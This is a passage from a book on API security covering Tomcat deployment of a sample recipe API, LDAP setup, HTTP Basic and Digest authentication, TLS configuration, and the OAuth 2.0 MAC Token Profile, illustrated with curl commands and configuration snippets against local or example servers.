digest sent from the client, which is derived from the cleartext password (or the hash of username:realm:password). CUTE-CUPCAKE FACTORY: DEPLOYING THE RECIPE API IN APACHE TOMCAT In this example, you deploy a prebuilt web application with the Recipe API in Apache Tomcat. The Recipe API is hosted and maintained by the cute-cupcake factory. It’s a public API with which the customers of cute-cupcake factory can interact. The Recipe API supports the following five operations: • GET /recipe: Returns all the recipes in the system • GET /recipe/{$recipeNo}: Returns the recipe with the given recipe number • POST /recipe: creates a new recipe in the system • PUT /recipe: Updates the recipe in the system with the given details • DELETE /recipe/{$recipeNo}: deletes the recipe from the system with the provided recipe number You can download the latest version of Apache Tomcat from http://tomcat.apache.org. All the examples discussed in this book use Tomcat 9.0.20. To deploy the API, download the recipe.war file from https://github.com/ apisecurity/samples/blob/master/appendix-f/recipe.war and copy it to [TOMCAT_HOME]\webapps. To start Tomcat, run the following from the [TOMCAT_HOME]\ bin directory: [Linux] sh catalina.sh run [Windows] catalina.bat run once the server is started, use cURL to execute the following command. Here it’s assumed that Tomcat is running on its default HTTP port 8080: \> curl http://localhost:8080/recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 413 This returns all the recipes in the system as a JSon payload: { "recipes":[ { "recipeId":"10001", "name":"Lemon Cupcake", "ingredients":"lemon zest, white sugar,unsalted butter, flour,salt, milk", "directions":"Preheat oven to 375 degrees F (190 degrees C). Line 30 cupcake pan cups with paper liners...." }, { "recipeId":"10002", "name":"Red Velvet Cupcake", "ingredients":"cocoa powder, eggs, white sugar,unsalted butter, flour,salt, milk", "directions":" Preheat oven to 350 degrees F. Mix flour, cocoa powder, baking soda and salt in medium bowl. Set aside...." } ] } To get the recipe of any given cupcake, use the following cURL command, where 10001 is the Id of the cupcake you just created: \> curl http://localhost:8080/recipe/10001 This returns the following JSon response: { "recipeId":"10001", "name":"Lemon Cupcake", "ingredients":"lemon zest, white sugar,unsalted butter, flour,salt, milk", "directions":"Preheat oven to 375 degrees F (190 degrees C). Line 30 cupcake pan cups with paper liners...." } APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 414 To create a new recipe, use the following cURL command: curl -X POST -H 'Content-Type: application/json' -d '{"name":"Peanut Butter Cupcake", "ingredients":"peanut butter, eggs, sugar,unsalted butter, flour,salt, milk", "directions":"Preheat the oven to 350 degrees F (175 degrees C). Line a cupcake pan with paper liners, or grease and flour cups..." }' http://localhost:8080/recipe This returns the following JSon response: { "recipeId":"10003", "location":"http://localhost:8080/recipe/10003", } To update an existing recipe, use the following cURL command: curl -X PUT -H 'Content-Type: application/json' -d '{"name":"Peanut Butter Cupcake", "ingredients":"peanut butter, eggs, sugar,unsalted butter, flour,salt, milk", "directions":"Preheat the oven to 350 degrees F (175 degrees C). Line a cupcake pan with paper liners, or grease and flour cups..." }' http://localhost:8080/recipe/10003 This returns the following JSON response: { "recipeId":"10003", "location":"http://localhost:8080/recipe/10003", } To delete an existing recipe, use the following cURL command: \> curl -X DELETE http://localhost:8080/recipe/10001 APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 415 Note To do remote debugging with Apache Tomcat, start the server under Linux operating system as sh catalina.sh jpda run or under Windows operating system as catalina.bat jpda run. This opens port 8000 for remote debugging connections. CONFIGURING APACHE DIRECTORY SERVER (LDAP) Apache directory Server is an open source LdAP server distributed under Apache 2.0 license. You can download the latest version from http://directory.apache.org/studio/. It’s recommended that you download the Apache directory Studio8 itself, as it comes with a set of very useful tools to configure LdAP. We use Apache directory Studio 2.0.0 in the following example. The following steps are needed only if you don’t have an LdAP server set up to run. First you need to start Apache directory Studio. This provides a management console to create and manage LdAP servers and connections. Then proceed with the following steps: 1. From Apache directory Studio, go to the LdAP Servers view. If it’s not there already, go to Window ➤ Show View ➤ LdAP Servers. 2. Right-click LdAP Servers View, choose new ➤ new Server, and select ApachedS 2.0.0. Give any name to the server in the Server name text box, and click Finish. 3. The server you created appears in the LdAP Servers view. Right-click the server, and select Run. If it’s started properly, State is updated to Started. 4. To view or edit the configuration of the server, right-click it and select open configuration. By default, the server starts on LdAP port 10389 and LdAPS port 10696. 8 Apache Directory Studio user guide for setting up and getting started is available at http:// directory.apache.org/studio/users-guide/apache_directory_studio/ APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 416 now you have an LdAP server up and running. Before you proceed any further, let’s create a test connection to it from the Apache directory Studio: 1. From Apache directory Studio, get to the connections view. If it’s not there already, go to Window ➤ Show View ➤ connections. 2. Right-click connections View, and select new connection. 3. In the connection name text box, give a name to the connection. 4. The Host name field should point to the server where you started the LdAP server. In this case, it’s localhost. 5. The Port field should point to the port of your LdAP server, which is 10389 in this case. 6. Keep Encryption Method set to no Encryption for the time being. click next. 7. Type uid=admin,ou=system as the Bind dn and secret as the Bind Password, and click Finish. These are the default Bind dn and password values for Apache directory Server. 8. The connection you just created appears in the connections view. double-click it, and the data retrieved from the underlying LdAP server appears in the LdAP Browser view. In the sections that follow, you need some users and groups in the LdAP server. Let’s create a user and a group. First you need to create an organizational unit (oU) structure under the dc=example,dc=com domain in Apache directory Server: 1. In Apache directory Studio, get to the LdAP browser by clicking the appropriate LdAP connection in the connections view. 2. Right-click dc=example,dc=com, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick organizationalUnit from Available object classes, click Add, and then click next. Select ou for the Rdn, and give it the value groups. click next and then Finish. 3. Right-click dc=example,dc=com, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick organizationalUnit from Available object class, click Add, and then click next. Select ou for the Rdn, and give it the value users. click next and then Finish. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 417 4. Right-click dc=example,dc=com/ou=users, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick inetorgPerson from Available object class, click Add, and then click next. Select uid for the Rdn, give it a value, and click next. complete the empty fields with appropriate values. Right-click the same pane, and choose new Attribute. Select userPassword as the Attribute Type, and click Finish. Enter a password, select SSHA-256 as the hashing method, and click oK. 5. The user you created appears under dc=example,dc=com/ou=users in the LdAP browser. 6. To create a group, right-click dc=example,dc=com/ou=groups ➤ new ➤ new Entry ➤ create Entry From Scratch. Pick groupofUniquenames from Available object class, click Add, and click next. Select cn for the Rdn, give it a value, and click next. Give the dn of the user created in the previous step as the uniqueMember (e.g., uid=prabath,ou=users,ou=system), and click Finish. 7. The group you created appears under dc=example,dc=com/ou=groups in the LdAP browser. CONNECTING APACHE TOMCAT TO APACHE DIRECTORY SERVER (LDAP) You’ve already deployed the Recipe API in Apache Tomcat. Let’s see how you can configure Apache Tomcat to talk to the LdAP server you configured, following these steps: 1. Shut down the Tomcat server if it’s running. 2. By default, Tomcat finds users from the conf/tomcat-users.xml file via org.apache.catalina.realm.UserDatabaseRealm. 3. open [TOMCAT_HOME]\conf\server.xml, and comment out the following line in it: <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 418 factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> 4. In [TOMCAT_HOME]\conf\server.xml, comment out the following line, which points to the UserDatabaseRealm: <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> 5. To connect to the LdAP server, you should use the JNDIRealm. copy and paste the following configuration into [ToMcAT_HoME]\conf\server.xml just after <Realm classname="org.apache.catalina.realm.LockoutRealm">: <Realm className="org.apache.catalina.realm.JNDIRealm" debug="99" connectionURL="ldap://localhost:10389" roleBase="ou=groups , dc=example, dc=com" roleSearch="(uniqueMember={0})" roleName="cn" userBase="ou=users, dc=example, dc=com" userSearch="(uid={0})"/> SECURING AN API WITH HTTP BASIC AUTHENTICATION The Recipe API that you deployed in Apache Tomcat is still an open API. Let’s see how to secure it with HTTP Basic authentication. You want to authenticate users against the corporate LdAP server and also use access control based on HTTP operations (GET, POST, DELETE, PUT). The following steps guide you on how to secure the Recipe API with HTTP Basic authentication: 1. Shut down the Tomcat server if it’s running, and make sure connectivity to the LdAP server works correctly. 2. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml and add the following under the root element <web-app>. The security-role element at the bottom of the following configuration lists all the roles allowed to use this web application: APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 419 <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> <url-pattern>/∗</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> </security-role> This configuration will protect the complete Recipe API from unauthenticated access attempts. A legitimate user should have an account in the corporate LdAP server and also should be in the admin group. If you don’t have a group called admin, change the preceding configuration appropriately. 3. You can further enable fine-grained access control to the Recipe API by HTTP operation. You need to have a <security-constraint> element defined for each scenario. The following two configuration blocks will let any user that belongs to the admin group perform GET/POST/PUT/DELETE on the Recipe API, whereas a user that belongs to the user group can only do a GET. When you define an http-method inside a web-resource-collection element, only those methods are protected. The rest can be invoked by anyone if no other security constraint has any restrictions on those methods. For example, if you only had the second block, then any user would be able to do a POST. Having the first block that controls POST will allow only the legitimate user to do a POST to the Recipe API. The security-role element at the bottom of the following configuration lists all the roles allowed to use this web application: <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 420 <url-pattern>/∗</url-pattern> <http-method>GET</http-method> <http-method>PUT</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> <url-pattern>/∗</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>user</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> <role-name>user</role-name> </security-role> ENABLING TLS IN APACHE TOMCAT The way you configured HTTP Basic authentication in the previous exercise isn’t secure enough. It uses HTTP to transfer credentials. Anyone who can intercept the channel can see the credentials in cleartext. Let’s see how to enable Transport Layer Security (TLS) in Apache Tomcat and restrict access to the Recipe API only via TLS: APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 421 1. To enable TLS, first you need to have a keystore with a public/private key pair. You can create a keystore using Java keytool. It comes with the JdK distribution, and you can find it in [JAVA_HoME]\bin. The following command creates a Java keystore with the name catalina-keystore.jks. This command uses catalina123 as the keystore password as well as the private key password. Note JAVA_HOME refers to the directory where you’ve installed the JdK. To run the keytool, you need to have Java installed in your system. \> keytool -genkey -alias localhost -keyalg RSA -keysize 1024 -dname "CN=localhost" -keypass catalina123 -keystore catalina-keystore.jks -storepass catalina123 2. copy catalina-keystore.jks to [TOMCAT_HOME]\conf, and add the following element to [TOMCAT_HOME]\conf\server.xml under the <Service> parent element. Replace the values of keyStoreFile and keystorePass elements appropriately: <Connector port="8443" maxThreads="200" scheme="https" secure="true" SSLEnabled="true" keystoreFile="absolute/path/to/catalina-keystore.jks" keystorePass="catalina123" clientAuth="false" sslProtocol="TLS"/> 3. Start the Tomcat server, and execute the following cURL command to validate the TLS connectivity. Make sure you replace the values of username and password appropriately. They must come from the underlying user store: \> curl -k -u username:password https://localhost:8443/recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 422 You’ve configured Apache Tomcat to work with TLS. next you need to make sure that the Recipe API only accepts connections over TLS. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml, and add the following under each <security-constraint> element. This makes sure only TLS connections are accepted: <user-data-constraint> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> SECURING THE RECIPE API WITH HTTP DIGEST AUTHENTICATION The Tomcat JNDIRealm that you used previously to connect to the LdAP server doesn’t support HTTP digest authentication. If you need HTTP digest authentication support, you have to write your own Realm, extending Tomcat JNDIRealm, and override the getPassword() method. To see how to secure an API with digest authentication, we need to switch back to the Tomcat UserDatabaseRealm: 1. open [TOMCAT_HOME]\conf\server.xml, and make sure that the following line is there. If you commented this out during a previous exercise, revert it back: <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> 2. In [TOMCAT_HOME]\conf\server.xml, make sure that the following line, which points to UserDatabaseRealm, is there. If you commented it out during a previous exercise, revert it back: <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 423 3. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml, and add the following under the root element <web-app>: <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource- name> <url-pattern>/∗ </url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>DIGEST</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> </security-role> 4. open [TOMCAT_HOME]\conf\tomcat-users.xml, and add the following under the root element. This adds a role and a user to Tomcat’s default file system–based user store: <role rolename="admin"/> <user username="prabath" password="prabath123" roles="admin"/> 5. Invoke the API with the cURL command shown next. The --digest -u username:password option used here generates the password in digest mode and adds it to the HTTP request. Replace username:password with appropriate values: \> curl -k -v --digest -u username:password https://localhost:8443/ recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 425 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_22 APPENDIX G OAuth 2.0 MAC Token Profile The OAuth 2.0 core specification doesn’t mandate any specific token type. It’s one of the extension points introduced in OAuth 2.0. Almost all public implementations use the OAuth 2.0 Bearer Token Profile. This came up with the OAuth 2.0 core specification, but as an independent profile, documented under RFC 6750. Eran Hammer, who was the lead editor of the OAuth 2.0 specification by that time, introduced the Message Authentication Code (MAC) Token Profile for OAuth 2.0. (Hammer also led the OAuth 1.0 specification.) Since its introduction to the OAuth 2.0 IETF working group in November 2011, the MAC Token Profile has made a slow progress. The slow progress was mostly due to the fact that the working group was interested in building a complete stack around bearer tokens before moving into another token type. In this chapter, we will take a deeper look into the OAuth 2.0 MAC Token Profile and its applications. OAUTH 2.0 AND THE ROAD TO HELL One of the defining moments of OAuth 2.0 history was the resignation of OAuth 2.0 specification lead editor Eran Hammer. On July 26, 2012, he wrote a famous blog post titled “OAuth 2.0 and the Road to Hell”1 after announcing his resignation from the OAuth 2.0 IETF working group. As highlighted in the blog post, Hammer thinks OAuth 2.0 is a bad protocol, just like any WS-* (web services) standard. In his comparison, OAuth 1.0 is much better than OAuth 2.0 in terms of complexity, interoperability, usefulness, completeness, and security. Hammer was worried about the direction in which OAuth 2.0 was heading, because it was not what was intended by the web community that initially formed the OAuth 2.0 working group. 1 Available at http://hueniverse.com/2012/07/oauth-2-0-and-the-road-to-hell/ 426 According to Hammer, the following were the initial objectives of the OAuth 2.0 working group: • Build a protocol very similar to OAuth 1.0. • Simplify the signing process. • Add a light identity layer. • Address native applications. • Add more flows to accommodate more client types. • Improve security. In his blog post, Hammer highlighted the following architectural changes from OAuth 1.0 to 2.0 (extracted from http://hueniverse.com/2012/07/oauth-2-0-and-the-road-to- hell/): • Unbounded tokens: In 1.0, the client has to present two sets of credentials on each protected resource request, the token credentials and the client credentials. In 2.0, the client credentials are no longer used. This means that tokens are no longer bound to any particular client type or instance. This has introduced limits on the usefulness of access tokens as a form of authentication and increased the likelihood of security issues. • Bearer tokens: 2.0 got rid of all signatures and cryptography at the protocol level. Instead, it relies solely on TLS. This means that 2.0 tokens are inherently less secure as specified. Any improvement in token security requires additional specifications, and as the current proposals demonstrate, the group is solely focused on enterprise use cases. • Expiring tokens: 2.0 tokens can expire and must be refreshed. This is the most significant change for client developers from 1.0, as they now need to implement token state management. The reason for token expiration is to accommodate self-encoded tokens—encrypted tokens, which can be authenticated by the server without a database look-up. Because such tokens are self-encoded, they cannot be revoked and therefore must be short-lived to reduce their exposure. Whatever is gained from the removal of the signature is lost twice in the introduction of the token state management requirement. • Grant types: In 2.0, authorization grants are exchanged for access tokens. Grant is an abstract concept representing the end user approval. It can be a code received after the user clicks “Approve” on an access request, or the AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 427 user’s actual username and password. The original idea behind grants was to enable multiple flows. 1.0 provides a single flow, which aims to accommodate multiple client types. 2.0 adds significant amount of specialization for different client types. Most of all, Hammer wasn’t in favor of the authorization framework built by OAuth 2.0 and the extensibility introduced. His argument was that the Web doesn’t need another security framework: what it needs is a simple, well-defined security protocol. Regardless of these arguments, over the years OAuth 2.0 has become the de facto standard for API security—and the extensibility introduced by OAuth 2.0 is paying off. Bearer Token vs. MAC Token Bearer tokens are just like cash. Whoever owns one can use it. At the time you use it, you don’t need to prove you’re the legitimate owner. It’s similar to the way you could use stolen cash with no problem; what matters is the validity of the cash, not the owner. MAC tokens, on the other hand, are like credit cards. Whenever you use a credit card, you have to authorize the payment with your signature. If someone steals your card, the thief can’t use it unless they know how to sign exactly like you. That’s the main advantage of MAC tokens. With bearer tokens, you always have to pass the token secret over the wire. But with MAC tokens, you never pass the token secret over the wire. The key difference between bearer tokens and MAC tokens is very similar to the difference between HTTP Basic authentication and HTTP Digest authentication, which we discussed in Appendix F. Note draft 5 of the OAuth 2.0 MAC Token profile is available at http:// tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-05. This chapter is based on draft 5, but this is an evolving specification. The objective of this chapter is to introduce the MAC Token profile as an extension of OAuth token types. The request/response parameters discussed in this chapter may change as the specification evolves, but the basic concepts will remain the same. It’s recommended that you keep an eye on https://datatracker.ietf.org/ doc/draft-ietf-oauth-v2-http-mac/ to find out the latest changes taking place. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 428 Obtaining a MAC Token The OAuth 2.0 core specification isn’t coupled with any of the token profiles. The OAuth flows discussed in Chapter 4 applies in the same way for MAC tokens. OAuth grant types don’t have any dependency on the token type. A client can obtain a MAC token by using any grant type. Under the authorization code grant type, the resource owner that visits the application initiates the flow. The client, which must be a registered application at the authorization server, redirects the resource owner to the authorization server to get the approval. The following is a sample HTTP redirect, which takes the resource owner to the OAuth authorization server: https://authz.server.com/oauth2/authorize?response_type=code& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback The value of response_type must be code. This indicates to the authorization server that the request is for an authorization code. client_id is an identifier for the client application. Once the client application is registered with the authorization server, the client gets a client_id and a client_secret. The value of redirect_uri should be same as the value registered with the authorization server. During the client registration phase, the client application must provide a URL under its control as the redirect_uri. The URL- encoded value of the callback URL is added to the request as the redirect_uri parameter. In addition to these parameters, a client application can also include a scope parameter. The value of the scope parameter is shown to the resource owner on the approval screen. It indicates to the authorization server the level of access the client needs on the target resource/API. The previous HTTP redirect returns the requested code to the registered callback URL: https://mycallback/?code=9142d4cad58c66d0a5edfad8952192 The value of the authorization code is delivered to the client application via an HTTP redirect and is visible to the resource owner. In the next step, the client must exchange the authorization code for an OAuth access token by talking to the OAuth token endpoint exposed by the authorization server. This can be an authenticated request with the client_id and the client_secret of the client application in the HTTP authorization header, if the token endpoint is secured with HTTP Basic authentication. The value of the grant_type parameter must be the authorization_code, and the value of the code AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 429 should be the one returned from the previous step. If the client application set a value for the redirect_uri parameter in the previous request, then it must include the same value in the token request. The client can’t suggest to the authorization server the type of token it expects: it’s entirely up to the authorization server to decide, or it can be based on a pre-agreement between the client and the authorization server at the time of client registration, which is outside the scope of OAuth. The following cURL command to exchange the authorization code for a MAC token is very similar to what you saw for the Bearer Token Profile (in Chapter 4). The only difference is that this introduces a new parameter called audience, which is a must for a MAC token request: \> curl -v -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=authorization_code& code=9142d4cad58c66d0a5edfad8952192& redirect_uri=https://mycallback& audience=https://resource-server-URI" https://authz.server.com/oauth2/token The previous cURL command returns the following response: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store { "access_token": "eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", "token_type":"mac", "expires_in":3600, "refresh_token":"8xLOxBtZp8", "kid":"22BIjxU93h/IgwEb4zCRu5WF37s=", "mac_key":"adijq39jdlaska9asud", "mac_algorithm":"hmac-sha-256" } AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 430 Let’s examine the definition of each parameter: access_token: The OAuth 2.0 access token, which binds the client, the resource owner, and the authorization server together. With the introduction of the audience parameter, this now binds all of those with the resource server as well. Under the MAC Token Profile, by decoding the access token, you should be able to find the audience of the access token. If someone tampers with the access token to change the audience, that will make the token validation fail automatically at the authorization server. token_type: Type of the token returned from the authorization server. The client should first try to understand the value of this parameter and begin processing accordingly. The processing rules differ from one token type to another. Under the MAC Token Profile, the value of the token type must be mac. expires_in: The lifetime of the access token in seconds. refresh_token: The refresh token associated with the access token. The refresh token can be used to acquire a new access token. kid: Stands for key identifier. This is an identifier generated by the authorization server. It’s recommended that you generate the key identifier by base64 encoding the hashed access token: kid = base64encode (sha-1 (access_token)). This identifier uniquely identifies the mac_key used later to generate the MAC while invoking the resource APIs. mac_key: A session key generated by the authorization server, having the same lifetime as the access token. The mac_key is a shared secret used later to generate the MAC while invoking the resource APIs. The authorization server should never reissue the same mac_key or the same kid. mac_algorithm: The algorithm to generate the MAC during API invocation. The value of the mac_algorithm should be well understood by the client, authorization server, and resource server. The OAuth 2.0 access token is opaque to anyone outside the authorization server. It may or may not carry meaningful data, but no one outside the authorization server should try to interpret it. The OAuth 2.0 MAC Token Profile defines a more meaningful structure for the access token; it’s no longer an arbitrary string. The resource server should understand the structure of the access token generated by the authorization server. Still, the client should not try to interpret it. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 431 The access token returned from the authorization server to the client is encoded with the audience, key identifier, and encrypted value of the mac_key. The mac_key must be encrypted with the public key of the resource server or with a shared key established between the resource server and the authorization server via a prior agreement outside the scope of OAuth. When accessing a protected API, the client must send the access token along with the request. The resource server can decode the access token and get the encrypted mac_key, which it can later decrypt from its own private key or the shared key. OAUTH 2.0 AUDIENCE INFORMATION The audience parameter is defined in the OAuth 2.0: Audience Information Internet draft available at http://tools.ietf.org/html/draft-tschofenig-oauth- audience-00. This is a new parameter introduced into the OAuth token request flow and is independent of the token type. Once it’s approved as an IETF proposed standard, the Bearer Token profile also will be updated to include this in the access token request. The objective of the audience parameter introduced by the OAuth 2.0: Audience Information Internet draft is to identify the audience of an issued access token. With this, the access token issued by the authorization server is for a specific client, to be used against a specific resource server or a specific set of resource servers. All resource servers should validate the audience of the access token before considering it valid. After completing the authorization-granting phase, the client must decide which resource server to access and should find the corresponding audience uRI. That must be included in the access token request to the token endpoint. Then the authorization server must check whether it has any associated resource servers that can be identified by the provided audience uRI. If not, it must send back the error code invalid_request. If all validations pass at the authorization server, the new Internet draft suggests including the allowed audience in the access token. While invoking an ApI hosted in the resource server, it can decode the access token and find out whether the allowed audience matches its own. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 432 Invoking an API Protected with the OAuth 2.0 MAC Token Profile Following any of the grant types, you can obtain a MAC token from the authorization server. Unlike with the Bearer Token Profile, this needs more processing at the client end before you invoke an API protected with the MAC Token Profile. Prior to invoking the protected API, the client must construct an authenticator. The value of the authenticator is then added to the HTTP authorization header of the outgoing request. The authenticator is constructed from the following parameters: kid: The key identifier from the authorization grant response. ts: Timestamp, in milliseconds, since January 1, 1970. seq-nr: Indicates the initial sequence number to be used during the message exchange between the client and the resource server, from client to server. access_token: The value of the access token from the authorization grant response. mac: The value of the MAC for the request message. Later, this appendix discusses how to calculate the MAC. h: Colon-separated header fields, used to calculate the MAC. cb: Specifies the channel binding. Channel bindings are defined in “Channel Bindings for TLS,” RFC 5929, available at http://tools.ietf.org/html/rfc5929. The Channel Bindings for TLS RFC defines three bindings: tls-unique, tls-server-end- point, and tls-unique-for-telnet. The following is a sample request to access an API secured with an OAuth 2.0 MAC Token Profile. GET /patient?name=peter&id=10909HTTP/1.1 Host: medicare.com Authorization: MAC kid="22BIjxU93h/IgwEb4zCRu5WF37s=", ts="1336363200", seq-nr="12323", access_token="eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM=", h="host", cb="tls-unique:9382c93673d814579ed1610d3" AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 433 Calculating the MAC The OAuth 2.0 MAC Token Profile defines two algorithms to calculate the MAC: HMAC- SHA1 and HMAC-SHA256. It also provides an extension for additional algorithms. The Message Authentication Code (MAC) provides integrity and authenticity assurance for the associated message. The MAC algorithm accepts a message and a secret key to produce the associated MAC. To verify the MAC, the receiving party should have the same key and calculate the MAC of the received message. If the calculated MAC is equal to the MAC in the message, that guarantees integrity and authenticity. A Hash-based Message Authentication Code (HMAC) is a specific way of calculating the MAC using a hashing algorithm. If the hashing algorithm is SHA-1, it’s called HMAC-SHA1. If the hashing algorithm is SHA256, then it’s called HMAC-SHA256. More information about HMAC is available at http://tools.ietf.org/html/rfc2104. The HMAC-SHA1 and HMAC-SHA256 functions need to be implemented in the corresponding programming language. Here’s the calculation with HMAC-SHA1: mac = HMAC-SHA1(mac_key, input-string) And here it is with HMAC-SHA256: mac = HMAC-SHA256(mac_key, input-string) For an API invocation request, the value of input-string is the Request-Line from the HTTP request, the timestamp, the value of seq-nr, and the concatenated values of the headers specified under the parameter h. HTTP REQUEST-LINE The HTTp Request-Line is defined in Section 5 of the HTTp RFC, available at www.w3.org/ Protocols/rfc2616/rfc2616-sec5.html. The request line is defined as follows: Request-Line = Method SP Request-URI SP HTTP-Version CRLF The value of Method can be OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT, or any extension method. SP stands for space—to be technically accurate, it’s ASCII code 32. Request-URI identifies the representation of the resource where the request is sent. According to the HTTp specification, there are four ways to construct a Request-URI: AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 434 Request-URI = "∗" | absoluteURI | abs_path | authority The asterisk (*) means the request targets not a specific resource but the server itself, for example, OpTIOnS * HTTp/1.1. The absoluteURI must be used when the request is made through a proxy, for example, GET https://resource-server/myresource HTTP/1.1. abs_path is the most common form of a Request-URI. In this case, the absolute path with respect to the host server is used. The uRI or the network location of the server is transmitted in the HTTp Host header. For example: GET /myresource HTTP/1.1 Host: resource-server The authority form of the Request-URI is only used with HTTp CONNECT method. This method is used to make a connection through a proxy with tunneling, as in the case of TLS tunneling. After the Request-URI must be a space and then the HTTp version, followed by a carriage return and a line feed. Let’s take the following example: POST /patient?name=peter&id=10909&blodgroup=bpositive HTTP/1.1 Host: medicare.com The value of the input-string is POST /patient?name=peter&id=10909&blodgroup=bpositive HTTP/1.1 \n 1336363200 \n 12323 \n medicare.com \n 1336363200 is the timestamp, 12323 is the sequence number, and medicare.com is the value of the Host header. The value of the Host header is included here because it is set in the h parameter of the API request under the HTTP Authorization header. All of these entries should be separated by a newline separator character, denoted by \n in the example. Once the input string is derived, the MAC is calculated on it using the mac_key and the MAC algorithm specified under mac_algorithm. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 435 MAC Validation by the Resource Server To access any API secured with the OAuth 2.0 MAC Token Profile, the client should send the relevant parameters with the API invocation request. If any of the parameters are lacking in the request or the provided values are invalid, the resource server will respond with an HTTP 401 status code. The value of the WWW-Authenticate header should be set to MAC, and the value of the error parameter should explain the nature of the error: HTTP/1.1 401 Unauthorized WWW-Authenticate: MAC error="Invalid credentials" Let’s consider the following valid API request, which comes with a MAC header: GET /patient?name=peter&id=10909HTTP/1.1 Host: medicare.com Authorization: MAC kid="22BIjxU93h/IgwEb4zCRu5WF37s=", ts="1336363200", seq-nr="12323", access_token="eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM=", h="host", cb="tls-unique:9382c93673d814579ed1610d3" To validate the MAC of the request, the resource server has to know the mac_key. The client must pass the mac_key to the resource server, encoded in the access_token. The first step in validation is to extract the mac_key from the access_token in the request. Once the access_token is decoded, the resource server has to verify its audience. The authorization server encodes the audience of the access_token into the access_token. Once the access_token is verified and the scopes associated with it are validated, the resource server can cache the mac_key by the kid. The cached mac_key can be used in future message exchanges. According to the MAC Token Profile, the access_token needs to be included only in the first request from the client to the resource server. The resource server must use the cached mac_key (against the kid) to validate subsequent messages in the message exchange. If the initial access_token doesn’t have enough privileges to invoke a later AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 436 API, the resource server can request a new access_token or a complete authenticator by responding with an HTTP WWW-Authenticate header. The resource server must calculate the MAC of the message the same way the client did before and compare the calculated MAC with the value included in the request. If the two match, the request can be considered a valid, legitimate one. But you still need to make sure there are no replay attacks. To do that, the resource server must verify the timestamp in the message by comparing it with its local timestamp. An attacker that can eavesdrop on the communication channel between the client and the resource server can record messages and replay them at a different time to gain access to the protected resource. The OAuth 2.0 MAC Token Profile uses timestamps as a way of detecting and mitigating replay attacks. OAuth Grant Types and the MAC Token Profile OAuth grant types and token types are two independent extension points introduced in the OAuth 2.0 core specification. They don’t have any direct dependency between each other. This chapter only talks about the authorization code grant type, but all the other grant types work in the same manner: the structure of the access token returning from the implicit grant type, the resource owner password credentials grant type, and the client credentials grant type is the same. OAuth 1.0 vs. OAuth 2.0 MAC Token Profile Eran Hammer (who was initially the lead editor of the OAuth 2.0 specification) submitted the initial OAuth 2.0 MAC Token Profile draft to the OAuth working group in May 2011, and the first 